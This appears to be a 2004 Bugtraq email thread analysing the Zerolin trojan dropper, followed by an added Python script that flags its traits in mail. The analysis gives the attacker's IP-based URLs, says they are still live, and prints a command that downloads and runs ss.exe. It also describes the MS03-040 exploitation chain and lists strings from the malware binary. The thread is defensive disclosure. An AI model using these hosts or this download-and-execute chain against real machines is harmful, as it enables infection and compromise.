Nicolas was kind enough to provide me with a sample of Zerolin. Anyone
who is even remotely up-to-date with their patches will not be affected
by this.

At the end of the email is a short piece of encoded JScript code which,
when decoded, outputs a hidden iframe that retrieves the following URL:

http://202.99.172.153/link.html

Don't click the link, it is still live.

Following a lot of pagebreaks is an attempt to exploit the Object Data
vulnerability that was fixed by MS03-040. If successful, this launches
MSHTA.EXE which executes the code provided by

http://202.99.172.153/link.php

which in turn outputs an embedded file to C:\x.exe, after which it
executes the following command:

C:\x.exe http://202.99.172.153/ss.exe

Here are some of the more interesting strings from that file, which
suggest Zerolin talks back to index.php on that same IP to notify its
owner of a compromised machine:

CoCreateGuid StringFromCLSID ole32.dll
wsprintfA CreateWindowExA DefWindowProcA DispatchMessageA GetMessageA
KillTimer LoadCursorA LoadIconA PostQuitMessage RegisterClassExA
SendMessageA SetTimer SetWindowsHookExA TranslateMessage
UnhookWindowsHookEx USER32.dll
CloseHandle CopyFileA CreateMutexA CreateProcessA CreateThread
DeleteFileA ExitProcess FreeLibrary GetCommandLineA GetCurrentProcess
GetFileSize GetModuleFileNameA GetModuleHandleA GetProcAddress
GetSystemDirectoryA GetTickCount GetVersionExA GlobalAlloc GlobalFree
LoadLibraryA OpenMutexA ReleaseMutex Sleep TerminateProcess
WaitForSingleObject WinExec _lclose _lcreat _lopen _lread _lwrite
lstrcatA lstrcmpA lstrcpyA lstrlenA KERNEL32.dll
InitializeAcl IsValidAcl RegCloseKey RegCreateKeyA RegOpenKeyExA
RegQueryValueExA RegSetValueExA SetSecurityInfo ADVAPI32.dll
WS2_32.dll
%lu Timer UP Timer Down &Name= http:// /index.php?Client= close
SSClass SSIcon kernel32.dll RegisterServiceProcess
\dss.dll \dssa.dll dssa.dll \ss.dat \ss.dop
202.99. CLSID\ \InProcServer32
Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
172.153
Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
Default AutoProc ss.exe \ss.exe one
CallNextHookEx USER32.dll
GetSystemDirectoryA WinExec lstrcatA KERNEL32.dll
dss.dll AutoProc \ss.exe
FindWindowA SendMessageA USER32.dll
DeleteFileA GetFileSize GetSystemDirectoryA GlobalAlloc GlobalFree
WinExec _lclose _lcreat _lopen _lread _lwrite lstrcatA lstrcpyA
KERNEL32.dll
dssa.dll AutoProc \ss.exe \ss.dat \ss.dop

Regards

Thor Larholm
Senior Security Researcher
PivX Solutions
23 Corporate Plaza #280
Newport Beach, CA 92660
http://www.pivx.com
thor@xxxxxxxx
Stock symbol: (PIVX.OB)
Phone: +1 (949) 231-8496
PGP: 0x4207AEE9
B5AB D1A4 D4FD 5731 89D6 20CD 5BDB 3D99 4207 AEE9

PivX defines a new genre in Desktop Security: Proactive Threat
Mitigation.
<http://www.pivx.com/qwikfix>

-----Original Message-----
From: T.H. Haymore [mailto:bonk@xxxxxxxxxxxxxxxxxxxxxxx]
Sent: Friday, August 13, 2004 7:51 AM
To: Nicolas Gregoire
Cc: bugtraq@xxxxxxxxxxxxxxxxx; Mark.Amos@xxxxxxxxxxxxxxxx
Subject: Re: JS/Zerolin

On Fri, 13 Aug 2004, Nicolas Gregoire wrote:

Nicolas,

Thanks for the insight. I've received several replies telling me to
look at McAfee (yadda-yadda) and other sites. I am well aware of the
Zerolin VBS script as I researched it before posting. You've provided
what insight I was looking for on the JavaScript side.

Mark, I think this is what we're looking for.

Also, keep us updated as to what else you see as this could very well
be a new version and they are indeed 'testing'.

Thanks again,

-th

<snip>

> Hi,
>
> I've seen these emails since last Friday, and my gateway has since
> received around 200 of them. KAV and ClamAV detect them as
> "TrojanDropper.VBS.Zerolin"
>
> It appears that a small Jscript.Encoded code is hidden at the bottom
> of a false (true ?) spam. After several redirections, an ss.exe file
> is downloaded. This file is detected as follows :
>
> KAV : Trojan.Win32.Genme.c
> Trend : not detected
> ClamAV : Trojan.Xebiz.A
> F-Prot : W32/Xebiz.A
> NAI : not detected
>
> Regards,
> --
> Nicolas Gregoire ----- Information Systems Security Consultant

=================================================
Travis
www.cyberabuse.org/crimewatch
Email: Bonk@xxxxxxxxxxxxxxx | Bonk@xxxxxxxxxxxxxx
=================================================
/"\
\ /
 X   ASCII Ribbon Campaign
/ \  Against HTML Email
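
A mail-gateway check for the message traits described in this thread (an encoded script block, an object element with a data attribute, and a long run of line breaks), added here as an example and not part of the original emails. The function name, the 30-break threshold, the interpretation of "pagebreaks" as `<br>` tags or newlines, and the sample messages are assumptions constructed for illustration.

```python
import email
import re
from email import policy

# Script blocks declared as encoded, or carrying the Script Encoder "#@~^" start marker.
ENCODED_SCRIPT = re.compile(
    r"<script[^>]*language\s*=\s*[\"']?(?:jscript|vbscript)\.encode|#@~\^", re.I)
# <object> elements that load their content through a data= attribute.
OBJECT_DATA = re.compile(r"<object\b[^>]*\bdata\s*=\s*[\"']?([^\"'\s>]+)", re.I)
# A long run of line breaks that pushes content out of view (threshold is an assumption).
PADDING = re.compile(r"(?:(?:<br\s*/?>|\r?\n)[ \t]*){30,}", re.I)


def scan_message(raw):
    """Return a sorted list of findings for one RFC 822 message given as a string."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = set()
    for part in msg.walk():
        if part.get_content_maintype() != "text":
            continue  # skip multipart containers and binary attachments
        body = part.get_content()
        if ENCODED_SCRIPT.search(body):
            findings.add("encoded-script")
        m = OBJECT_DATA.search(body)
        if m:
            findings.add("object-data:" + m.group(1))
        if PADDING.search(body):
            findings.add("line-break-padding")
    return sorted(findings)


# Constructed sample: placeholder markup only, no real encoded payload or live host.
SAMPLE = (
    "From: sender@example.invalid\n"
    "To: user@example.invalid\n"
    "Subject: constructed sample\n"
    "MIME-Version: 1.0\n"
    "Content-Type: text/html; charset=us-ascii\n"
    "\n"
    "<html><body>Ordinary looking text.\n"
    + "<br>\n" * 40 +
    '<object data="http://example.invalid/placeholder"></object>\n'
    '<script language="JScript.Encode">#@~^PLACEHOLDER^#~@</script>\n'
    "</body></html>\n"
)
CLEAN = "From: a@example.invalid\nSubject: hello\n\nJust text.\n"

if __name__ == "__main__":
    print(scan_message(SAMPLE))
```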